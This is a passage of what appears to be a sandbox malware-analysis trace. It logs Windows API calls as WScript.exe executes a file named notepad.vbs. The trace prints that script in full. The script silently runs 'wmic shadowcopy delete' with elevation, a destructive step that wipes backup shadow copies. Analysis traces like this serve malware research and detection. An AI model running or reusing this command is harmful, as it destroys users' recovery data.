"c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 420 start_va = 0x2300000 end_va = 0x233ffff entry_point = 0x0 region_type = private name = "private_0x0000000002300000" filename = "" Region: id = 421 start_va = 0x3230000 end_va = 0x332ffff entry_point = 0x0 region_type = private name = "private_0x0000000003230000" filename = "" Region: id = 422 start_va = 0x7efa1000 end_va = 0x7efa3fff entry_point = 0x0 region_type = private name = "private_0x000000007efa1000" filename = "" Thread: id = 6 os_tid = 0x994 [0022.935] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x26fe88 | out: lpSystemTimeAsFileTime=0x26fe88*(dwLowDateTime=0xede50a80, dwHighDateTime=0x1d4a418)) [0022.935] GetCurrentProcessId () returned 0x990 [0022.936] GetCurrentThreadId () returned 0x994 [0022.936] GetTickCount () returned 0x1625a [0022.936] QueryPerformanceCounter (in: lpPerformanceCount=0x26fe80 | out: lpPerformanceCount=0x26fe80*=1809863200000) returned 1 [0022.936] GetStartupInfoA (in: lpStartupInfo=0x26fe9c | out: lpStartupInfo=0x26fe9c*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0022.937] GetModuleHandleA (lpModuleName=0x0) returned 0xa10000 [0022.937] GetModuleHandleA (lpModuleName=0x0) returned 0xa10000 [0022.937] GetVersionExA (in: lpVersionInformation=0x26fdac*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x1000000, dwMinorVersion=0x26fcfc, dwBuildNumber=0x0, dwPlatformId=0x26ff1c, szCSDVersion="\xcd\x1e\x8c\x77\xd3\x8a\x13") | out: lpVersionInformation=0x26fdac*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0022.937] GetUserDefaultLCID () returned 0x409 [0022.937] CoInitialize (pvReserved=0x0) returned 0x0 [0022.945] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs\" " [0022.945] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs\" ") returned 85 [0022.945] GetCurrentThreadId () returned 0x994 [0022.945] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fbbc | out: phkResult=0x26fbbc*=0x98) returned 0x0 [0022.945] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26fbc0 | out: phkResult=0x26fbc0*=0x9c) returned 0x0 [0022.945] RegQueryValueExW (in: hKey=0x9c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x26ef70, lpData=0x26ef74, lpcbData=0x26ef6c*=0x400 | out: lpType=0x26ef70*=0x0, lpData=0x26ef74*=0x0, lpcbData=0x26ef6c*=0x400) returned 0x2 [0022.945] RegQueryValueExW (in: hKey=0x98, lpValueName="Enabled", lpReserved=0x0, lpType=0x26ef70, lpData=0x26ef74, lpcbData=0x26ef6c*=0x400 | out: lpType=0x26ef70*=0x0, lpData=0x26ef74*=0x0, lpcbData=0x26ef6c*=0x400) returned 0x2 [0022.945] RegQueryValueExW (in: hKey=0x9c, lpValueName="Enabled", lpReserved=0x0, lpType=0x26ef70, lpData=0x26ef74, lpcbData=0x26ef6c*=0x400 | out: lpType=0x26ef70*=0x0, lpData=0x26ef74*=0x0, lpcbData=0x26ef6c*=0x400) returned 0x2 [0022.945] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0022.953] RegCloseKey (hKey=0x9c) returned 0x0 [0022.953] RegCloseKey (hKey=0x98) returned 0x0 [0022.953] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f98c | out: phkResult=0x26f98c*=0x98) returned 0x0 [0022.953] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f988 | out: phkResult=0x26f988*=0x9c) returned 0x0 [0022.953] RegQueryValueExW (in: hKey=0x9c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x26ed18, lpData=0x26ed1c, lpcbData=0x26ed14*=0x400 | out: lpType=0x26ed18*=0x0, lpData=0x26ed1c*=0x3, lpcbData=0x26ed14*=0x400) returned 0x2 [0022.953] RegQueryValueExW (in: hKey=0x98, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x26ed18, lpData=0x26ed1c, lpcbData=0x26ed14*=0x400 | out: lpType=0x26ed18*=0x0, lpData=0x26ed1c*=0x3, lpcbData=0x26ed14*=0x400) returned 0x2 [0022.953] RegQueryValueExW (in: hKey=0x9c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x26ed18, lpData=0x26ed1c, lpcbData=0x26ed14*=0x400 | out: lpType=0x26ed18*=0x0, lpData=0x26ed1c*=0x3, lpcbData=0x26ed14*=0x400) returned 0x2 [0022.953] RegCloseKey (hKey=0x9c) returned 0x0 [0022.953] RegCloseKey (hKey=0x98) returned 0x0 [0022.953] GetACP () returned 0x4e4 [0022.953] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75a20000 [0022.954] GetProcAddress (hModule=0x75a20000, lpProcName="HeapSetInformation") returned 0x75a35651 [0022.954] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0022.954] FreeLibrary (hLibModule=0x75a20000) returned 1 [0022.954] CoRegisterMessageFilter (in: lpMessageFilter=0x6d1380, lplpMessageFilter=0x6d1388 | out: lplpMessageFilter=0x6d1388*=0x0) returned 0x0 [0022.954] IUnknown:AddRef (This=0x6d1380) returned 0x2 [0022.954] GetModuleFileNameW (in: hModule=0xa10000, lpFilename=0x26fbfc, nSize=0x105 | out: lpFilename="C:\\Windows\\SysWOW64\\WScript.exe" (normalized: "c:\\windows\\syswow64\\wscript.exe")) returned 0x1f [0022.954] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", lpdwHandle=0x26f610 | out: lpdwHandle=0x26f610) returned 0x704 [0022.954] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\SysWOW64\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x26eef0 | out: lpData=0x26eef0) returned 1 [0022.954] VerQueryValueW (in: pBlock=0x26eef0, lpSubBlock="\\", lplpBuffer=0x26f60c, puLen=0x26f608 | out: lplpBuffer=0x26f60c*=0x26ef18, puLen=0x26f608) returned 1 [0022.954] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f620 | out: phkResult=0x26f620*=0x98) returned 0x0 [0022.954] RegQueryValueExW (in: hKey=0x98, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x26e9ec, lpData=0x26e9f0, lpcbData=0x26e9e8*=0x400 | out: lpType=0x26e9ec*=0x0, lpData=0x26e9f0*=0xfe, lpcbData=0x26e9e8*=0x400) returned 0x2 [0022.955] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x26f61c | out: phkResult=0x26f61c*=0x9c) returned 0x0 [0022.955] RegQueryValueExW (in: hKey=0x9c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x26f5e4, lpData=0x26f618, lpcbData=0x26f5ec*=0x4 | out: lpType=0x26f5e4*=0x0, lpData=0x26f618*=0xff, lpcbData=0x26f5ec*=0x4) returned 0x2 [0022.955] RegQueryValueExW (in: hKey=0x9c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x26e9ec, lpData=0x26e9f0, lpcbData=0x26e9e8*=0x400 | out: lpType=0x26e9ec*=0x0, lpData=0x26e9f0*=0xfe, lpcbData=0x26e9e8*=0x400) returned 0x2 [0022.955] RegQueryValueExW (in: hKey=0x98, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x26f5e4, lpData=0x26f618, lpcbData=0x26f5ec*=0x4 | out: lpType=0x26f5e4*=0x0, lpData=0x26f618*=0xff, lpcbData=0x26f5ec*=0x4) returned 0x2 [0022.955] RegQueryValueExW (in: hKey=0x98, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x26e9ec, lpData=0x26e9f0, lpcbData=0x26e9e8*=0x400 | out: lpType=0x26e9ec*=0x1, lpData="1", lpcbData=0x26e9e8*=0x4) returned 0x0 [0022.955] lstrlenW (lpString="1") returned 1 [0022.955] lstrlenW (lpString="0") returned 1 [0022.955] lstrlenW (lpString="1") returned 1 [0022.955] lstrlenW (lpString="no") returned 2 [0022.955] lstrlenW (lpString="1") returned 1 [0022.955] lstrlenW (lpString="false") returned 5 [0022.955] RegCloseKey (hKey=0x9c) returned 0x0 [0022.955] RegCloseKey (hKey=0x98) returned 0x0 [0022.955] RegCreateKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26f62c, lpdwDisposition=0x0 | out: phkResult=0x26f62c*=0x98, lpdwDisposition=0x0) returned 0x0 [0022.955] RegQueryValueExW (in: hKey=0x98, lpValueName="Timeout", lpReserved=0x0, lpType=0x26f5f0, lpData=0x26f620, lpcbData=0x26f5f8*=0x4 | out: lpType=0x26f5f0*=0x0, lpData=0x26f620*=0x68, lpcbData=0x26f5f8*=0x4) returned 0x2 [0022.955] RegQueryValueExW (in: hKey=0x98, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x26e9f8, lpData=0x26e9fc, lpcbData=0x26e9f4*=0x400 | out: lpType=0x26e9f8*=0x1, lpData="1", lpcbData=0x26e9f4*=0x4) returned 0x0 [0022.955] lstrlenW (lpString="1") returned 1 [0022.955] lstrlenW (lpString="0") returned 1 [0022.955] lstrlenW (lpString="1") returned 1 [0022.955] lstrlenW (lpString="no") returned 2 [0022.955] lstrlenW (lpString="1") returned 1 [0022.955] lstrlenW (lpString="false") returned 5 [0022.955] RegCloseKey (hKey=0x98) returned 0x0 [0022.955] RegCreateKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x26f62c, lpdwDisposition=0x0 | out: phkResult=0x26f62c*=0x98, lpdwDisposition=0x0) returned 0x0 [0022.956] RegQueryValueExW (in: hKey=0x98, lpValueName="Timeout", lpReserved=0x0, lpType=0x26f5f0, lpData=0x26f620, lpcbData=0x26f5f8*=0x4 | out: lpType=0x26f5f0*=0x0, lpData=0x26f620*=0x68, lpcbData=0x26f5f8*=0x4) returned 0x2 [0022.956] RegQueryValueExW (in: hKey=0x98, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x26e9f8, lpData=0x26e9fc, lpcbData=0x26e9f4*=0x400 | out: lpType=0x26e9f8*=0x0, lpData=0x26e9fc*=0x31, lpcbData=0x26e9f4*=0x400) returned 0x2 [0022.956] RegCloseKey (hKey=0x98) returned 0x0 [0022.956] lstrlenW (lpString="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs") returned 48 [0022.956] lstrlenW (lpString="vbs") returned 3 [0022.956] lstrlenW (lpString="WSH") returned 3 [0022.956] LoadStringW (in: hInstance=0xa10000, uID=0x9c5, lpBuffer=0x26d97c, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13 [0022.959] LoadTypeLib (in: szFile="C:\\Windows\\SysWOW64\\WScript.exe", pptlib=0x26f1a4*=0x0 | out: pptlib=0x26f1a4*=0x40fb18) returned 0x0 [0022.964] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fb18, GUID=0xa11acc, ppTInfo=0x26f18c | out: ppTInfo=0x26f18c*=0x410c4c) returned 0x0 [0023.098] ITypeInfo:GetRefTypeOfImplType (in: This=0x410c4c, index=0xffffffff, pRefType=0x26f180 | out: pRefType=0x26f180*=0xfffffffe) returned 0x0 [0023.098] ITypeInfo:GetRefTypeInfo (in: This=0x410c4c, hreftype=0xfffffffe, ppTInfo=0xa29060 | out: ppTInfo=0xa29060*=0x410c78) returned 0x0 [0023.098] IUnknown:Release (This=0x410c4c) returned 0x1 [0023.099] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fb18, GUID=0xa13c7c, ppTInfo=0x26f17c | out: ppTInfo=0x26f17c*=0x410ca4) returned 0x0 [0023.099] ITypeInfo:GetRefTypeOfImplType (in: This=0x410ca4, index=0xffffffff, pRefType=0x26f170 | out: pRefType=0x26f170*=0xfffffffe) returned 0x0 [0023.099] ITypeInfo:GetRefTypeInfo (in: This=0x410ca4, hreftype=0xfffffffe, ppTInfo=0xa290a0 | out: ppTInfo=0xa290a0*=0x410cd0) returned 0x0 [0023.099] IUnknown:Release (This=0x410ca4) returned 0x1 [0023.099] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fb18, GUID=0xa13c8c, ppTInfo=0x26f17c | out: ppTInfo=0x26f17c*=0x410cfc) returned 0x0 [0023.099] ITypeInfo:GetRefTypeOfImplType (in: This=0x410cfc, index=0xffffffff, pRefType=0x26f170 | out: pRefType=0x26f170*=0xfffffffe) returned 0x0 [0023.099] ITypeInfo:GetRefTypeInfo (in: This=0x410cfc, hreftype=0xfffffffe, ppTInfo=0xa290c0 | out: ppTInfo=0xa290c0*=0x410d28) returned 0x0 [0023.099] IUnknown:Release (This=0x410cfc) returned 0x1 [0023.099] ITypeLib:GetTypeInfoOfGuid (in: This=0x40fb18, GUID=0xa11cac, ppTInfo=0x26f17c | out: ppTInfo=0x26f17c*=0x410d54) returned 0x0 [0023.099] ITypeInfo:GetRefTypeOfImplType (in: This=0x410d54, index=0xffffffff, pRefType=0x26f170 | out: pRefType=0x26f170*=0xfffffffe) returned 0x0 [0023.099] ITypeInfo:GetRefTypeInfo (in: This=0x410d54, hreftype=0xfffffffe, ppTInfo=0xa29080 | out: ppTInfo=0xa29080*=0x410d80) returned 0x0 [0023.099] IUnknown:Release (This=0x410d54) returned 0x1 [0023.099] IUnknown:Release (This=0x40fb18) returned 0x4 [0023.099] GetCurrentThreadId () returned 0x994 [0023.099] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xe8 [0023.099] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xa12f25, lpParameter=0x6d2578, dwCreationFlags=0x0, lpThreadId=0x6d258c | out: lpThreadId=0x6d258c*=0x9a0) returned 0xf0 [0023.100] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x26f3a4*=0xe8, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0 [0023.181] CloseHandle (hObject=0xe8) returned 1 [0023.181] GetFullPathNameW (in: lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", nBufferLength=0x104, lpBuffer=0x26f404, lpFilePart=0x26f3f0 | out: lpBuffer="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs", lpFilePart=0x26f3f0*="notepad.vbs") returned 0x30 [0023.181] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey=".vbs", ulOptions=0x0, samDesired=0x20019, phkResult=0x26e998 | out: phkResult=0x26e998*=0x102) returned 0x0 [0023.182] RegQueryValueExW (in: hKey=0x102, lpValueName=0x0, lpReserved=0x0, lpType=0x26e960, lpData=0x26e99c, lpcbData=0x26e964*=0x800 | out: lpType=0x26e960*=0x1, lpData="VBSFile", lpcbData=0x26e964*=0x10) returned 0x0 [0023.182] RegCloseKey (hKey=0x102) returned 0x0 [0023.182] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="VBSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x26e998 | out: phkResult=0x26e998*=0x102) returned 0x0 [0023.182] RegQueryValueExW (in: hKey=0x102, lpValueName=0x0, lpReserved=0x0, lpType=0x26e960, lpData=0x26f1d4, lpcbData=0x26e964*=0x200 | out: lpType=0x26e960*=0x1, lpData="VBScript", lpcbData=0x26e964*=0x12) returned 0x0 [0023.182] RegCloseKey (hKey=0x102) returned 0x0 [0023.182] CLSIDFromString (in: lpsz="VBScript", pclsid=0x26f1a4 | out: pclsid=0x26f1a4*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8))) returned 0x0 [0023.183] CoCreateInstance (in: rclsid=0x26f1a4*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xa11aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26f1a0 | out: ppv=0x26f1a0*=0x6d29f8) returned 0x0 [0023.362] __dllonexit () returned 0x74c27164 [0023.362] __dllonexit () returned 0x74c2717e [0023.362] __dllonexit () returned 0x74c27198 [0023.362] GetUserDefaultLCID () returned 0x409 [0023.362] GetVersion () returned 0x1db10106 [0023.363] DllGetClassObject (in: rclsid=0x418c9c*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), riid=0x7558ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e494 | out: ppv=0x26e494*=0x6d29b8) returned 0x0 [0023.364] VBScriptEngine5:IClassFactory:CreateInstance (in: This=0x6d29b8, pUnkOuter=0x0, riid=0x26ee40*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26e480 | out: ppvObject=0x26e480*=0x6d29f8) returned 0x0 [0023.364] GetUserDefaultLCID () returned 0x409 [0023.364] GetACP () returned 0x4e4 [0023.364] VBScriptEngine5:IUnknown:AddRef (This=0x6d29f8) returned 0x2 [0023.364] VBScriptEngine5:IUnknown:Release (This=0x6d29f8) returned 0x1 [0023.364] VBScriptEngine5:IUnknown:Release (This=0x6d29b8) returned 0x0 [0023.364] VBScriptEngine5:IUnknown:QueryInterface (in: This=0x6d29f8, riid=0xa11aa0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26f168 | out: ppvObject=0x26f168*=0x6d29f8) returned 0x0 [0023.364] VBScriptEngine5:IUnknown:Release (This=0x6d29f8) returned 0x1 [0023.364] GetCurrentThreadId () returned 0x994 [0023.364] GetCurrentThreadId () returned 0x994 [0023.365] GetCurrentThreadId () returned 0x994 [0023.365] GetUserDefaultLCID () returned 0x409 [0023.365] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0023.365] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x26f158, cchData=6 | out: lpLCData="1252") returned 5 [0023.365] IsValidCodePage (CodePage=0x4e4) returned 1 [0023.365] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x75540000 [0023.365] GetProcAddress (hModule=0x75540000, lpProcName="CoCreateInstance") returned 0x75589d0b [0023.365] CoCreateInstance (in: rclsid=0x74c1b234*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74c1b244*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x6d2bd4 | out: ppv=0x6d2bd4*=0x409cd8) returned 0x0 [0023.366] IUnknown:AddRef (This=0x409cd8) returned 0x2 [0023.366] GetCurrentProcessId () returned 0x990 [0023.366] GetCurrentThreadId () returned 0x994 [0023.366] GetTickCount () returned 0x162e6 [0023.366] ISystemDebugEventFire:BeginSession (This=0x409cd8, guidSourceID=0x74c1b308, strSessionName="VBScript:00002448:00002452:18090854") returned 0x0 [0023.367] GetCurrentThreadId () returned 0x994 [0023.367] GetCurrentThreadId () returned 0x994 [0023.367] CreateFileW (lpFileName="C:\\Users\\5P5NRG~1\\AppData\\Local\\Temp\\notepad.vbs" (normalized: "c:\\users\\5p5nrg~1\\appdata\\local\\temp\\notepad.vbs"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x11c [0023.367] GetFileSize (in: hFile=0x11c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfc [0023.367] CreateFileMappingA (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xfc, lpName=0x0) returned 0x120 [0023.367] MapViewOfFile (hFileMappingObject=0x120, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x160000 [0023.368] GetVersionExA (in: lpVersionInformation=0x26f2b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7660b6d0, dwMinorVersion=0x26f338, dwBuildNumber=0x7660b72a, dwPlatformId=0x7786ffa6, szCSDVersion="\x5b\xdb\x5f\x76\x2c\xf3\x26") | out: lpVersionInformation=0x26f2b4*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0023.369] IsTextUnicode (in: lpv=0x160000, iSize=252, lpiResult=0x26f360 | out: lpiResult=0x26f360) returned 0 [0023.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x160000, cbMultiByte=252, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 252 [0023.369] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x160000, cbMultiByte=252, lpWideCharStr=0x419aec, cchWideChar=252 | out: lpWideCharStr="Set objShell = CreateObject(\"Shell.Application\")\r\nSet objWshShell = WScript.CreateObject(\"WScript.Shell\")\r\nSet objWshProcessEnv = objWshShell.Environment(\"PROCESS\")\r\nobjShell.ShellExecute \"wmic.exe\", \"shadowcopy delete /nointeractive\", \"\", \"runas\", 0\r\n") returned 252 [0023.369] UnmapViewOfFile (lpBaseAddress=0x160000) returned 1 [0023.369] CloseHandle (hObject=0x120) returned 1 [0023.369] CloseHandle (hObject=0x11c) returned 1 [0023.369] GetSystemDirectoryA (in: lpBuffer=0x26f323, uSize=0x0 | out: lpBuffer="") returned 0x14 [0023.369] GetSystemDirectoryA (in: lpBuffer=0x6d3028, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0023.369] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x75b30000 [0023.370] GetProcAddress (hModule=0x75b30000, lpProcName="SaferIdentifyLevel") returned 0x75b52102 [0023.370] GetProcAddress (hModule=0x75b30000, lpProcName="SaferComputeTokenFromLevel") returned 0x75b53352 [0023.370] GetProcAddress (hModule=0x75b30000, lpProcName="SaferCloseLevel") returned 0x75b53825 [0023.370] IdentifyCodeAuthzLevelW () returned 0x1 [0024.267] GetVersionExA (in: lpVersionInformation=0x26e9c8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x2, dwMinorVersion=0x80, dwBuildNumber=0x7787e026, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x26e9c8*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0024.267] GetUserDefaultLCID () returned 0x409 [0024.268] IsFileSupportedName () returned 0x1 [0024.268] _wcsicmp (_String1=".vbs", _String2=".vbs") returned 0 [0024.272] GetSignedDataMsg () returned 0x0 [0024.272] GetCurrentProcess () returned 0xffffffff [0024.272] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x120, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x26eef0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x26eef0*=0x14c) returned 1 [0024.272] GetFileSize (in: hFile=0x14c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xfc [0024.272] SetFilePointer (in: hFile=0x14c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0024.272] ReadFile (in: hFile=0x14c, lpBuffer=0x6de088, nNumberOfBytesToRead=0xfc, lpNumberOfBytesRead=0x26eec4, lpOverlapped=0x0 | out: lpBuffer=0x6de088*, lpNumberOfBytesRead=0x26eec4*=0xfc, lpOverlapped=0x0) returned 1 [0024.272] CoInitialize (pvReserved=0x0) returned 0x1 [0024.272] CoCreateInstance (in: rclsid=0x74ba1e54*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x74ba1d8c*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x26ee9c | out: ppv=0x26ee9c*=0x6de4f0) returned 0x0 [0024.563] __dllonexit () returned 0x74ae1815 [0024.563] __dllonexit () returned 0x74ae182f [0024.563] GetVersionExA (in: lpVersionInformation=0x26da2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x26da1c, dwMinorVersion=0x2, dwBuildNumber=0x270000, dwPlatformId=0x74ae4268, szCSDVersion="LÚ&") | out: lpVersionInformation=0x26da2c*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0024.563] GetProcessWindowStation () returned 0x48 [0024.563] GetUserObjectInformationA (in: hObj=0x48, nIndex=1, pvInfo=0x26da1c, nLength=0xc, lpnLengthNeeded=0x26da28 | out: pvInfo=0x26da1c, lpnLengthNeeded=0x26da28) returned 1 [0024.564] DllGetClassObject (in: rclsid=0x418cd0*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7558ee84*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26e194 | out: ppv=0x26e194*=0x6d29d8) returned 0x0 [0024.564] IClassFactory:CreateInstance (in: This=0x6d29d8, pUnkOuter=0x0, riid=0x26eb40*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x26e180 | out: ppvObject=0x26e180*=0x6de4f0) returned 0x0 [0024.564] GetSystemInfo (in: lpSystemInfo=0x26e0c0 | out: lpSystemInfo=0x26e0c0*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, 